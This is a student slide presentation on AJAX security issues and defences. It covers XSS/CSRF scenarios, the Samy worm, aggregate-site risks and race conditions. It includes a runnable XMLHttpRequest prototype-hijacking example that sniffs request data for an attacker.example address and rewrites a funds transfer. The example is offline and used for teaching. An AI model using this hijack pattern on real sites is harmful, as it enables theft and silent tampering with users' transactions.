AJAX Security Issues Kim Giglia CSC 682
Asynchronous JavaScript And XML (AJAX)
• Not a new technology, but a synergy of existing technologies:
• JavaScript
• DOM (Document Object Model)
• XML, JSON and XSLT
• DHTML, XHTML, and CSS
• XHR (XMLHttpRequest) object

Security Issues – General
• Ajax applications are more complex
• Hard to find knowledgeable developers
• More lines of code and more varied parts
• Ajax applications are transparent
• Messages between client and server travel over HTTP and can be intercepted and understood
• The application is accessible to anyone
• Some application logic is stored on the client

Specific Security Issues
• XSS and CSRF
• XML poisoning
• Malicious Ajax code injection
• RSS/Atom injection
• WSDL scanning and enumeration
• Client-side validation routines
• Web services routing issues
• Parameter manipulation with SOAP
• XPath injection
• RIA client binary manipulation
• XSS prototype hijacking
• HTTP request splitting
• Mashup site security problems
• Aggregate or Ajax portal site problems
• Race conditions

Why do issues arise?
• Tight deadlines
• Limited opportunity for training
• Pre-developed frameworks
Specific Attacks Illustrated
Malicious Ajax Code Injection – Theoretical Attack
• Attacker sits on a public wireless connection
• Target: a travel agency site, HighTechVacations.net
• The agency keeps its coupon array and its crypto functions in client-side JavaScript – oops!
• The agency does not validate all client-supplied input used in queries and performs data transformation on the client – oops!
• The agency ships user and admin functions together in one common.js file, including AjaxCalls.admin.addUser – oops!
XSS and CSRF – Theoretical Attack
• Attacker on a public wireless connection finds an XSS vulnerability in bank.com
• Attacker crafts a URL that points to the real bank.com site but carries a JavaScript payload in the query string
• Attacker e-mails the link to bank.com customers, inviting them to check out the new website
• A user follows the link and logs in – the payload captures the id and password
• The payload then uses an XHR object to request the account balance
• After the balance is extracted, the XHR object is used to request a transfer of funds
• The bank requires confirmation of the transfer – the payload reads the randomized token (nonce) out of the confirmation page with XHR and submits it, and the funds move
• The user never sees any of this activity because the DOM is not updated
• Before XHR, injected script could only fire blind requests (e.g. by submitting a hidden form) and could not read the response; running inside bank.com's origin, XHR can read the nonce, so the token check does not stop this CSRF
XSS and CSRF – Real Attack
• The Samy worm on myspace.com (2005)
• Samy inserted JavaScript into his own profile
• The worm redirects the browser to load the profile from www.myspace.com instead of profile.myspace.com, so that its XHR calls are same-origin
• It uses the XHR object to retrieve and modify the viewer's friends list and profile
• The site asks for confirmation of the profile update – the XHR object is used to extract the token and confirm
XSS Prototype Hijacking
• The attacker installs a wrapper around the XHR object:
  var xmlhttp = XMLHttpRequest;
  XMLHttpRequest = function() { this.xml = new xmlhttp(); return this; }
• The attacker now controls the xml attribute that holds the real object
• The attacker defines a sniff() function that sends the victim's data to the attacker's site
• Finally the attacker wraps the XHR send() function so that it calls sniff() and may even tamper with the parameters sent to the real site
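The hijack sketched above, carried through as an added example (not the slide's code): the attacker's payload replaces the XMLHttpRequest constructor, wraps send() with a sniff() step and tampers with the body before forwarding it. The "native" XHR here is a recording stub so the demo runs offline in Node; the global object, the /transfer request and the attacker.example collection URL are assumptions.

```javascript
// Added example: prototype hijacking of XMLHttpRequest, runnable offline.
// NativeXHR stands in for the browser's built-in object and only records
// what reaches it; in a browser the payload would wrap window.XMLHttpRequest
// after an XSS injection.
class NativeXHR {
  open(method, url) { this.method = method; this.url = url; }
  send(body) {
    this.sent = body;
    NativeXHR.log.push({ method: this.method, url: this.url, body });
  }
}
NativeXHR.log = []; // what the real server would receive

// A minimal "window" so the payload can overwrite XMLHttpRequest globally.
const win = { XMLHttpRequest: NativeXHR };

// Stands in for the attacker's server (https://attacker.example/collect).
const sniffed = [];

// --- attacker payload, executed once via XSS -----------------------------
function installHijack(global) {
  const realXHR = global.XMLHttpRequest; // keep a handle to the original

  // sniff(): copy the victim's request to the attacker's site
  function sniff(method, url, body) {
    sniffed.push({ method, url, body, leakedTo: 'https://attacker.example/collect' });
  }

  // Replacement constructor: the real object lives in this.xml
  global.XMLHttpRequest = function () {
    this.xml = new realXHR();
    return this;
  };
  global.XMLHttpRequest.prototype.open = function (method, url) {
    this.method = method;
    this.url = url;
    return this.xml.open(method, url);
  };
  // Wrapped send(): leak first, tamper, then forward to the real object
  global.XMLHttpRequest.prototype.send = function (body) {
    sniff(this.method, this.url, body);
    const tampered = typeof body === 'string'
      ? body.replace(/to=\w+/, 'to=attacker')
      : body;
    return this.xml.send(tampered);
  };
}

// --- legitimate application code, unaware of the hijack -----------------
function appTransfer(global, to, amount) {
  const xhr = new global.XMLHttpRequest();
  xhr.open('POST', '/transfer');
  xhr.send(`to=${to}&amount=${amount}`);
}

function demo() {
  installHijack(win);
  appTransfer(win, 'bob', 250);
  return { sniffed: sniffed[0], delivered: NativeXHR.log[0] };
}
```

The application's call looks entirely normal, yet the attacker sees the original body (to=bob) and the server receives the altered one (to=attacker). Because the hijack only works after script injection, client-side integrity checks on XMLHttpRequest run in the same compromised context; the defence is preventing the XSS in the first place.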
Aggregate Sites
• Data is aggregated from multiple untrustworthy sites
• Everything runs in the same security domain
• IFrame jails can be used, but a widget inside one jail can add a new iframe that points at another iframe outside the jail, compromising the jail
• NetVibes.com specifically allows widgets to POST to /save/userData.php – unless the iframe jail is extended to the server, there is no protection
• Session hijacking is possible if the iframe jail can reach the session ID
• Aggregates transmit your data over unencrypted connections
[Diagram: Hacker, Aggregate.com and Gmail.com, with links labelled Unencrypted and Encrypted]
Race Conditions – Not an Attack, Still a Problem
• Alice has direct deposit and banks online
• Alice transfers $2k from savings to checking online
• Simultaneously her $10k direct deposit is being posted
• Before the transfer and the deposit her checking balance was $2k
• After both execute her checking balance is $4k – what?!@%&?
• A race condition has occurred: both operations read the $2k balance, and the transfer's write overwrote the deposit's, so only the $2k transfer is reflected – the web app developers failed to account for races with other processes
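Alice's lost update, reproduced as an added example (not from the slides) with a deterministic interleaving, next to an optimistic-concurrency fix. The Account class, the round-robin scheduler and the amounts are constructed for the demo; each yield marks the moment where one client's read has returned but its write has not yet happened.

```javascript
// Added example: the read-modify-write race behind the $4k balance, and a
// compare-and-swap fix. Account is an in-memory stand-in for the database row.
class Account {
  constructor(balance) { this.balance = balance; this.version = 0; }
  read() { return this.balance; }
  write(v) { this.balance = v; this.version += 1; }
  readVersioned() { return { balance: this.balance, version: this.version }; }
  // Optimistic concurrency: write only if nobody wrote since our read
  // (SQL equivalent: UPDATE acct SET balance=?, version=version+1 WHERE version=?)
  writeIf(expectedVersion, v) {
    if (this.version !== expectedVersion) return false;
    this.write(v);
    return true;
  }
}

// Round-robin scheduler: each generator is one client; next() runs it to its
// next yield, so two clients interleave their read and write steps.
function runInterleaved(...clients) {
  let live = clients.slice();
  while (live.length) live = live.filter((g) => !g.next().done);
}

// Racy: read, pause, blind write (what the web app developers did).
function* creditRacy(acct, amount) {
  const balance = acct.read();
  yield; // the other client runs here
  acct.write(balance + amount);
}

// Safe: read with version, pause, conditional write; retry if we lost the race.
function* creditSafe(acct, amount) {
  for (;;) {
    const { balance, version } = acct.readVersioned();
    yield;
    if (acct.writeIf(version, balance + amount)) return;
    // conflict detected: re-read and try again
  }
}

// Checking starts at $2k; the $10k deposit and the $2k transfer post together.
function aliceRacy() {
  const checking = new Account(2000);
  runInterleaved(creditRacy(checking, 10000), creditRacy(checking, 2000));
  return checking.balance; // 4000: the transfer's write clobbered the deposit
}

function aliceSafe() {
  const checking = new Account(2000);
  runInterleaved(creditSafe(checking, 10000), creditSafe(checking, 2000));
  return checking.balance; // 14000: the transfer retried against the new balance
}
```

The racy version loses whichever write lands first; the safe version detects the conflict through the version check and retries. An atomic relative update (balance = balance + amount in a single statement) avoids the read-modify-write gap altogether and is the usual choice when the client does not need the intermediate value.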
Solutions to Security Issues
General recommendations
• Developer training and secure coding practices
• Specifically, validate all data input
• Get corporate management buy-in to foster a secure development environment
Specific solutions – code migration framework to Ajax
• Develop in Java:
• Access to strong IDEs
• Developers are more familiar with it than with JavaScript
• Static and dynamic analysis can catch vulnerabilities
• Use XMLVM and XSL stylesheet mappings to convert the Java automatically to JavaScript
• A prototype was developed to test feasibility
• This approach cannot support multi-threaded apps

Specific solutions – automatic partitioning
• Code in Jif 3.0, so the developer focuses on one language
• Jif code is compiled into WebIL
• The compiler separates the code into two programs, client and server, according to the security constraints
• Both programs are compiled into Java
• GWT transforms the client-side program into JavaScript
• Six small prototype apps were tested; no real-world apps
• The labels take getting used to

Specific solutions – construction frameworks to protect against injection
• An extension of the same-origin policy
• Identify every UI widget as a principal
• Sandbox each principal with respect to JavaScript
• Modify the browser to collect the list of principals as it walks the DOM tree
• Modify the development framework to attach principal annotations when HTML is generated
• Problems handling UIs that depend on other UIs
• No testing submitted by the authors

Specific solutions – BrowserShield
• Rewrites web pages to filter out malicious content
• THTML: tokenizes HTML and modifies it per security policies; tags script elements with bshield.translate()
• TSCRIPT: rewrites all JavaScript at runtime per the policies and feeds it through the Interposition Layer
• The Interposition Layer controls all DOM manipulations
• The authors built a prototype and tested it against all critical vulnerabilities for which IE released patches in 2005
• 12 vulnerabilities related to HTML, script, and ActiveX – 100% caught by BrowserShield
Conclusions
• Developing secure Ajax applications is a work in progress
• Continued developer education and awareness is needed
• Some changes in corporate culture may have to happen
• If Ajax applications are developed carelessly and users are attacked, people may decide to stop using the web, which could stifle certain industries
• Above all, developers should validate their data inputs